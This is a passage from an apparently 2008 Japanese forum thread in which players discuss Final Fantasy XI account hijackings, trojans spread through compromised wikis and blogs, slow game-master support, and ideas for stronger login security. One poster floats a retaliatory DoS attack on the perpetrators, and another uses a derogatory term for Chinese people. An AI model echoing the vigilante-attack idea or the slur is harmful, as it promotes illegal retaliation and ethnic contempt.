ソースコード書き込まれたらアウトならwikiとか危ないと思うんだけど違うの?
314既にその名前は使われています:2008/03/25(火) 01:38:12.64 ID:4E2nw6wM
>>313
あってる
315既にその名前は使われています:2008/03/25(火) 01:38:48.39 ID:CPKgTWTl
FFのWikiでリンク先を罠サイトに書き換えられたことはあった。
今はリンクたどって飛ぶときは警告出るようになってたはず。
ジョブ別のWikiはわからん…
316既にその名前は使われています:2008/03/25(火) 01:40:05.02 ID:slcFTapg
wikiを見るだけで感染
ということはまったくないのだろうか?
317既にその名前は使われています:2008/03/25(火) 01:40:25.33 ID:9ZDfFG9H
サービスは365日24時間なのに、サポセンはお休み有。
ふしぎ
318既にその名前は使われています:2008/03/25(火) 01:41:28.99 ID:vHIgAKgq
フレのフレがさっきハックされた。
さっきまでGMと交渉中だったらしいが、身近に起こるとまじで怖いな、てかむかつくage
319既にその名前は使われています:2008/03/25(火) 01:44:02.30 ID:hs/jxftM
頭おかしいよ業者
逆にDoS攻撃出来ないかな
320既にその名前は使われています:2008/03/25(火) 01:46:17.19 ID:7Ffb97n9
>>317
仕方ない 中の人だってヒトの子だ
もし過労死なんかされたら被害者であるはずのこっちが殺人者扱いされる
てけとーなバイト雇って今以上にてけとーな対応されても困るし
321既にその名前は使われています:2008/03/25(火) 01:46:49.14 ID:6E0RlrkX
今回被害にあって警察いって
電子データ?が被害にあったと認められ、被害届け受理されて、何らかの対処まで行くとするならば。
■がこれまで主張していた、ゲームデータはスクエアに所有権が帰属するって一方的に主張してるのがくつがえるかもな
たとえ、ゲーム会社が契約で書いて承諾させたとしても、その文章が違憲となれば、データはユーザー側のものとなって
このくそのろい対応や、セキュリティや管理に注意を払わせることにつながらねーかな?
金もらってサービスを受けてるのに、ろくなサポートもしねー。
何かをいっても、華麗にスルー、あまりにも顧客を馬鹿にしすぎてきた■にそろそろ鉄槌をくだすべきじゃねーか?
今回だけは明日はわが身だ
322既にその名前は使われています:2008/03/25(火) 01:47:42.14 ID:ysJWQJk7
>>320
同じ人が常時対応してるワケじゃねーだろw
323既にその名前は使われています:2008/03/25(火) 01:48:27.67 ID:9ZDfFG9H
今回のは結構被害者多そうな。
324既にその名前は使われています:2008/03/25(火) 01:48:48.23 ID:9f0lVnnD
>>321
だよなあ。いままで不正もなにもしていない
ふつーのユーザーが突然被害にあうんだもん。怖すぎるよー。
明日はわが身だ。
325既にその名前は使われています:2008/03/25(火) 01:52:33.09 ID:xwSNSLwB
業者はbotネット使って、DDoS攻撃してくるんじゃ?
それはさておき、パスワードやめてUSBトークンとか使った鍵認証とかにすればいいのにな。
PS2やPS2にもUSBつなげそうだし。追加数千円(導入時のみ)でだせば結構売れるかも?
326既にその名前は使われています:2008/03/25(火) 01:52:57.22 ID:4E2nw6wM
>>321
セキュリティは本人のせいだろうに
鯖ハックされたんなら■eの責任だろうけど
つか、警察は動くよ。でも電子データがどうのこうのは関係なく、トロイ配布とかそれに準ずる行為のほうでだけど
■eのGMの対応は、あれ以外やりようがないだろwこないだ、他人にID売ってから
サポセン電話してキャラ取り返したアフォが出たからな、本人と確認出来ても危ないってこった
327既にその名前は使われています:2008/03/25(火) 01:53:31.73 ID:xwSNSLwB
>>325
PS2やPS3だorz
328既にその名前は使われています:2008/03/25(火) 01:53:38.76 ID:2UE3q0B9
fc2の一件から被害の報告が増えたなー
ここに来てる報告だけでもこれだけあるんだから、相当被害が拡大してると思うんだが。
せめて公式にアナウンスして欲しいもんだ。
ネ実で頑張って啓蒙しても、■が誇る数十万ユーザーに情報が行き渡るわけじゃないんだからさ
329既にその名前は使われています:2008/03/25(火) 01:54:44.80 ID:rNeX04xY
アカウントハックされてますってすぐにこないGMも糞だな。
330既にその名前は使われています:2008/03/25(火) 01:57:26.83 ID:wc2s+Fxx
だとしても■側が出来るレベル、やって当然のレベルの対応を怠ってるってのは何度も言われてきてるんだよな。
暗号化ファイルをそのまま別のPOLクライアントに入れたらそのまま動くとかさ。
正直RMT利用者への対応とか変えないとダメだろ。現状RMTでBANされてもキャラ名出るわけでもないんだし、
「RMTやってた」って罪でBANされた事を前面に出さないと業者はもっと悪質な手に出る可能性もある。
331既にその名前は使われています:2008/03/25(火) 01:57:38.83 ID:CPKgTWTl
GMのまにゅあるwでアカハックの優先順位がまだ低いんじゃない?
地形ハマリとかは何件待ちでも5分くらいで来る。優先順位が高く設定されてて
すぐに対応するように決められると思う。
垢ハックは通常のコールと同じ優先順位の対応なんだろう。
332既にその名前は使われています:2008/03/25(火) 01:57:43.45 ID:slcFTapg
カスペでスキャンしたとき
ロックされてるって出る部分は安全なの?
333既にその名前は使われています:2008/03/25(火) 02:01:35.72 ID:zAORBuM/
住んでる地域や使用プロバイダやIPの情報を自分で登録して、そこ以外から
接続あっても繋ぐことができない、みたいなシステムってスクエニ側で作れないの?
ネカフェとか友達の家で繋ぎたいって人だけ制限をボタン1つで解除できるようなシステム
334280:2008/03/25(火) 02:01:51.03 ID:mx3cOLzk
くそ!メンテ時間までに来なかった。
直前までハック野郎がフレの倉庫でアクセスしてて、なにもできないのがすげームカついた!
明日も朝からGM呼んでみるか。
335既にその名前は使われています:2008/03/25(火) 02:02:57.84 ID:9f0lVnnD
>>334
がんばって!!
336既にその名前は使われています:2008/03/25(火) 02:03:03.50 ID:9ZDfFG9H
このメンテは何かの対策なのか、それとも単なる不具合の修正なのか・・・
337既にその名前は使われています:2008/03/25(火) 02:04:57.38 ID:9HKbKXJk
対策ならPOLもメンテ入るだろうよ
今月いっぱいシカトするなら俺もちょっと引退考えるな
ついていけない
338既にその名前は使われています:2008/03/25(火) 02:05:52.80 ID:QVf8SjqO
パスワード2つ発行すればいいんじゃないか?
ひとつは、いままでのIDとPASS。
もうひとつは非常用のIDとPASS。これはPOL上では保存せず保管。

緊急時には非常用のをPOL上でソフトウェア入力して使用。

あんまいみないかねー。
339既にその名前は使われています:2008/03/25(火) 02:07:22.07 ID:rvQA3x19
新スレ作るしかないか。■が嫌でも動かなきゃいけないくらい、いろんなとこに貼り付けるしかないな。

340既にその名前は使われています:2008/03/25(火) 02:10:11.67 ID:WT1MZrdK
尻鯖だけど、知り合いから聞いただけでも今日垢ハックされたの3名
多すぎないか?
341既にその名前は使われています:2008/03/25(火) 02:10:34.22 ID:6E0RlrkX
この2,3日はまじで「おまえらー」とかネタスレ作って遊んでる場合じゃねーよ
まじで 
342既にその名前は使われています:2008/03/25(火) 02:11:08.82 ID:wU4wL3FZ
>>338
あるでしょ
緊急用で発行されたもので入ると、即時アカウント凍結とか

さらにそれをHPで登録したメアド宛に発行できるといい
343既にその名前は使われています:2008/03/25(火) 02:12:17.77 ID:hs/jxftM
支那が喋れない様な日本語の音声認証をですね
344既にその名前は使われています:2008/03/25(火) 02:12:41.06 ID:9ZDfFG9H
>>338
24時間対応してるなら、あまり意味ないかもしれんが、
現状では意味あるんじゃね?
345既にその名前は使われています:2008/03/25(火) 02:13:41.52 ID:rvQA3x19
やばすぎだろ。ここまで、堂々とやられてるのに、何も対応しないとは、■倒産してもいいわ。
346既にその名前は使われています:2008/03/25(火) 02:14:18.85 ID:QVf8SjqO
>>341
【RMT業者】おまえら垢ハック大流行なのにFFか【ブログ改竄】
347既にその名前は使われています:2008/03/25(火) 02:14:50.98 ID:dKvvhOTu
>>329
アカウントハックされてる奴が多すぎてその順番待ちらしいw
フレがハッキンされて3時間ほど待たされた時の一言
348既にその名前は使われています:2008/03/25(火) 02:15:38.30 ID:9ZDfFG9H
大問題じゃないか
349既にその名前は使われています:2008/03/25(火) 02:15:44.70 ID:WT1MZrdK
身近な人間がやられるまでは対岸の火事と思えるが
実際に知り合いがやられると、理不尽な相手に対する怒りと
盗まれたキャラを目の前で見ながら何も出来ない無力感に絶望する
350既にその名前は使われています:2008/03/25(火) 02:15:54.43 ID:/5SLOYFD
もうゲーム内での迷惑行為ではなくてリアルに犯罪だもんなあ。
犯罪で金稼ぎ。
351既にその名前は使われています:2008/03/25(火) 02:15:59.57 ID:b1jIPTS8
そんなファッキングされてんだwwwwwwwwwwwwww
352既にその名前は使われています:2008/03/25(火) 02:17:16.72 ID:auLaoDR9
競売のサイトの奴とかも怖いぜo(`д´o)
353既にその名前は使われています:2008/03/25(火) 02:17:26.74 ID:2UE3q0B9
よくフリーメールとかにある「パスワードを忘れて再発行する時のための秘密の質問」
みたいのはどうだろう。
ペットの名前なり親の誕生日なりを設定して、たとえ外部から不正アクセスされてパスを
変えられても、ネットからそれでパスの再発行かアカウントの凍結ができるようにするとか。
今一番問題なのは、パスの再発行が時間の限られてるサポセンでしかできないって点だしね。
それさえ改善できれば少しはこっちの気苦労というか焦燥も無くなるんだけどな
354既にその名前は使われています:2008/03/25(火) 02:18:48.15 ID:vFPHu9Hl
GM>垢ハック被害のコール多くて頭おかしくなって死ぬ
355既にその名前は使われています:2008/03/25(火) 02:18:51.29 ID:rvQA3x19
すれたてしただけで、罠にはひっかからないよな・・・?
356既にその名前は使われています:2008/03/25(火) 02:21:29.75 ID:n1eE+/LN
サポセン体制やらさらなる対策を行うとすれば
その分のコストをどこから出すのかが問題かねぇ
月の課金額をリネ2並みにするなりしないと
株式会社としては利益を削る方向には動けないだろうし
357既にその名前は使われています:2008/03/25(火) 02:22:56.51 ID:9f0lVnnD
>>355
安心してスレ立てしておk。

2chがハッキングされたことってあるの?w
358既にその名前は使われています:2008/03/25(火) 02:24:08.74 ID:9f0lVnnD
>>356
本当にサポートやサービスが良くなるのなら
少々値上がりしても文句ないなー。
359既にその名前は使われています:2008/03/25(火) 02:24:24.31 ID:hpBmpOa9
アカハックされたときFFからGMコールして6時間またされたなぁ
夜間だとPOLから呼んだほうがはやいかも?
360既にその名前は使われています:2008/03/25(火) 02:24:39.85 ID:czdY66qa
>>357
クラックされてログが消えたことがあったかと
361既にその名前は使われています:2008/03/25(火) 02:25:16.82 ID:58aTjjEl
>>347
マジっすかw

有名FC2ブログ改竄の件で被害者がめちゃ増えたんだろうな。
FC2ブログが危ないってこのスレ追いかけてなきゃ分からない事実だったし。
信頼の置けるブログがハックされて罠仕掛けられてるなんて普通は思わないよ。

スクエニもシカトするのいい加減限界なはずなんだが、よく放置できるな。
既に信頼は地に落ちてるよ。
次世代MMO立ち上げても誰も付いて来ないんじゃないの?w
362既にその名前は使われています:2008/03/25(火) 02:25:20.96 ID:9f0lVnnD
>>360
そうなのか!こわいなあ〜。
363既にその名前は使われています:2008/03/25(火) 02:26:15.59 ID:9HKbKXJk
>>357
何度かあるよ
ここ4年ほどないと思うけど
364既にその名前は使われています
>>353
悪くはないと思うが、
アレって結構ザルなんだよねぇ

誕生日や好きなヒーローとかは設定するのはいいが、
試行回数が無限だとパスワードアタックし放題

大手サイト程この傾向が多いしねぇ